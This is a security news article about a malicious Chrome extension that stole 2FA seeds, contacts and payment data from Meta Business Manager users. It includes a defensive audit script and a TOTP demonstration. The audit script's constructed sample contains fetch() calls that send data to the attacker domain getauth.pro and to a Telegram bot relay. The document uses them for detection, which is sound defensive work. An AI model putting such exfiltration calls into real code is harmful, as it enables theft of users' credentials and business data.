
Malicious Chrome Extension Steals 2FA from Meta Business Manager
TL;DR
Security researchers at Socket have identified a malicious Chrome extension called "CL Suite by @CLMasters" that disguises itself as a useful tool for managing data from Meta Business Manager. Instead, it steals extremely sensitive information from victims, such as two-factor authentication (2FA) codes.
The extension was publicly available in the Chrome Web Store, Google Chrome's official extension store, raising concerns about the security of tools available to users.
How the Extension Works
A browser extension is a small program that adds extra functionality to the browser. To function, an extension requires permissions to access certain content from the websites a user visits, and those permissions are a potential security risk.
The malicious extension was marketed as a solution to "extract data, analyze Business Managers, remove verification pop-ups, and generate 2FA codes." It requested broad access to the domains meta.com and facebook.com.
Administrative panels like Meta Business Suite and Facebook Business Manager are used by organizations to manage their social media presence. Any extension that can access these tools has access to valuable business data.
The most common targets for extensions that promise conveniences are digital marketers, social media managers, and performance analysts who seek tools to facilitate information export.
Details of the Extension
The extension was published under the pseudonym CLMasters and was released on March 1, 2025, with its last update on March 6, 2025. Although it had only 28 installs at the time of discovery, each victim risks losing control over corporate assets.
The developer of the extension claimed that 2FA secrets were stored locally and not sent to external servers. However, analysis revealed that the extension sent all content to getauth.pro, including TOTP (Time-based One-Time Password) seeds, current codes, and login data.
The Role of TOTP Seeds
When enabling two-factor authentication, the user scans a QR code containing a TOTP "seed," the secret key that generates six-digit codes. The security of this method relies on protecting the seed; if it is compromised, the security of the 2FA is broken.
Attack Infrastructure
The extension's code included hardcoded URLs for data exfiltration, validation, and notifications. Every install used the same authentication token, and the system collected the victim's public IP address.
Tests confirmed that the infrastructure was active and had a valid TLS certificate, indicating that it was being actively maintained. The code collected data in separate modules and relayed it to Telegram, prioritizing stealth over transparency.
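The traits described above (broad host access to meta.com and facebook.com, hardcoded exfiltration URLs, a token shared by every install, and a Telegram relay) are all visible in an extension's static files. The following is an added example, not code from Socket or from the extension, of a defensive audit script that checks a manifest and a script for those traits. The manifest and script it scans are constructed samples modelled on the article's description; the domain getauth.pro and the Telegram relay come from the article, while the token value is a placeholder.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample manifest (not the real extension's file) with the broad
# host permissions the article describes.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Sample Suite",
    "host_permissions": ["*://*.facebook.com/*", "*://*.meta.com/*"],
    "permissions": ["storage", "tabs"],
})

# Constructed sample script showing the traits the article lists: a hardcoded
# exfiltration URL, a token shared by every install, and a Telegram relay.
# The token is a placeholder, not a value from the page.
SAMPLE_SCRIPT = '''
const API = "https://getauth.pro/api/collect";
const TOKEN = "PLACEHOLDER_SHARED_TOKEN";
async function report(payload) {
  await fetch(API, {method: "POST",
                    headers: {"Authorization": "Bearer " + TOKEN},
                    body: JSON.stringify(payload)});
  await fetch("https://api.telegram.org/botPLACEHOLDER/sendMessage");
}
'''

URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
# Literal assignments such as TOKEN = "..." or apiKey: '...'
SECRET_RE = re.compile(
    r"""(?i)\b(token|secret|apikey|api_key|bearer)\b\s*[=:]\s*["']([^"']{8,})["']""")
# Hosts whose business/admin panels the article says the extension targeted.
SENSITIVE_HOST_SUFFIXES = ("facebook.com", "meta.com")


def host_permissions(manifest_json: str) -> list[str]:
    """Collect host match patterns from MV3 host_permissions and MV2-style permissions."""
    manifest = json.loads(manifest_json)
    patterns = list(manifest.get("host_permissions", []))
    patterns += [p for p in manifest.get("permissions", [])
                 if "://" in p or p == "<all_urls>"]
    return patterns


def pattern_host(pattern: str) -> str:
    """Reduce '*://*.facebook.com/*' to 'facebook.com'; leave '<all_urls>' as-is."""
    match = re.match(r"^[^:]+://([^/]+)/", pattern)
    return match.group(1).lstrip("*.") if match else pattern


def _under(host: str, suffix: str) -> bool:
    return host == suffix or host.endswith("." + suffix)


def external_endpoints(script: str, allowed_hosts: list[str]) -> list[str]:
    """URLs in the script whose host is not one the extension is granted access to."""
    found = set()
    for url in URL_RE.findall(script):
        host = urlparse(url).hostname or ""
        if not any(_under(host, a) for a in allowed_hosts):
            found.add(url)
    return sorted(found)


def audit(manifest_json: str, script: str) -> dict:
    """Return the findings a reviewer would want before trusting the extension."""
    granted = [pattern_host(p) for p in host_permissions(manifest_json)]
    sensitive = [h for h in granted
                 if h == "<all_urls>" or any(_under(h, s) for s in SENSITIVE_HOST_SUFFIXES)]
    endpoints = external_endpoints(script, [h for h in granted if h != "<all_urls>"])
    telegram = [u for u in endpoints
                if (urlparse(u).hostname or "").endswith("telegram.org")]
    secrets = [f"{key}={value[:4]}..." for key, value in SECRET_RE.findall(script)]
    return {
        "sensitive_host_access": sensitive,
        "external_endpoints": endpoints,
        "telegram_relay": telegram,
        "hardcoded_secrets": secrets,
        "verdict": "suspicious" if (endpoints or secrets) else "no findings",
    }


if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_MANIFEST, SAMPLE_SCRIPT), indent=2))
```

The check is deliberately conservative: any URL outside the hosts the manifest grants, and any literal token assignment, is reported. A legitimate extension that only talks to the Graph API under facebook.com produces no findings, so the output is a list of items to inspect rather than a verdict on intent.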
Detailed 2FA Theft
After generating the TOTP, the module sent packets with the complete seed, the current six-digit code, the Facebook identifier, and the account email, allowing criminals to sync their code generators with those of the victims.
Additionally, the extension's code reported each use of the code generator to getauth.pro without the victim's consent.
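The two sections above ("The Role of TOTP Seeds" and "Detailed 2FA Theft") rest on one property of TOTP: the six-digit code is a deterministic function of the seed and the clock, so anyone holding the seed produces the same codes indefinitely. The following added example, not code from the article or from Socket, implements the standard RFC 4226/6238 algorithm and a server-side verifier so the property can be checked directly. The 20-byte seed is the RFC 6238 test vector; the "leaked seed" scenario is constructed.

```python
import base64
import hashlib
import hmac
import struct
import time


def hotp(seed: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    digest = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(seed: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from wall-clock time."""
    return hotp(seed, unix_time // step, digits)


def decode_seed(seed_b32: str) -> bytes:
    """Authenticator QR codes carry the seed in Base32; tolerate missing padding."""
    padded = seed_b32.strip().upper() + "=" * (-len(seed_b32.strip()) % 8)
    return base64.b32decode(padded)


def verify(seed: bytes, submitted: str, unix_time: int, skew_steps: int = 1) -> bool:
    """Server-side check accepting the current step and +/- skew_steps for clock drift."""
    counter = unix_time // 30
    return any(hmac.compare_digest(hotp(seed, counter + d), submitted)
               for d in range(-skew_steps, skew_steps + 1))


def codes_from_leaked_seed(seed: bytes, start_time: int, windows: int) -> list[str]:
    """Codes a second generator seeded with an exfiltrated seed will produce.
    Constructed scenario: shows why a leaked seed, unlike a leaked code, is not
    limited to one 30-second window and must be rotated by re-enrolling 2FA."""
    return [totp(seed, start_time + 30 * i) for i in range(windows)]


if __name__ == "__main__":
    # RFC 6238 Appendix B test seed, as Base32 (the form a QR code carries).
    seed = decode_seed("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ")
    now = int(time.time())
    print("current code:", totp(seed, now))
    print("next four codes from the same seed:", codes_from_leaked_seed(seed, now, 4))
```

The verifier uses `hmac.compare_digest` for the final comparison and accepts one step of skew on either side, which is the usual server behaviour; it also shows why the exfiltrated packets described above (seed plus current code plus account identifiers) are enough for the attacker's generator to pass the same check the victim's does.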
Contact Extraction
The "People Extractor" module compiled data on co-workers whenever the user opened the "People" section of Business Manager, extracting information such as names and emails and sending it to the criminals under the guise of a convenient export feature.
Collection of Analytics and Payment Details
Another module conducted silent collections of information about Business Manager IDs, advertising accounts, and payment methods, allowing criminals to gain an overview of the victims' financial infrastructure.
Potential Uses of Stolen Data
The combination of this information enables fraud in advertising campaigns, phishing directed at employees, and asset hijacking. Even after the extension is uninstalled, the stolen data remains in the criminals' hands, so victims must take rigorous security actions.
At the time of publication, the extension continued to be available in the Chrome Web Store, posing an ongoing risk to new users. Online security requires constant attention, especially concerning seemingly useful tools.
Content selected and edited with AI assistance. Original sources referenced above.


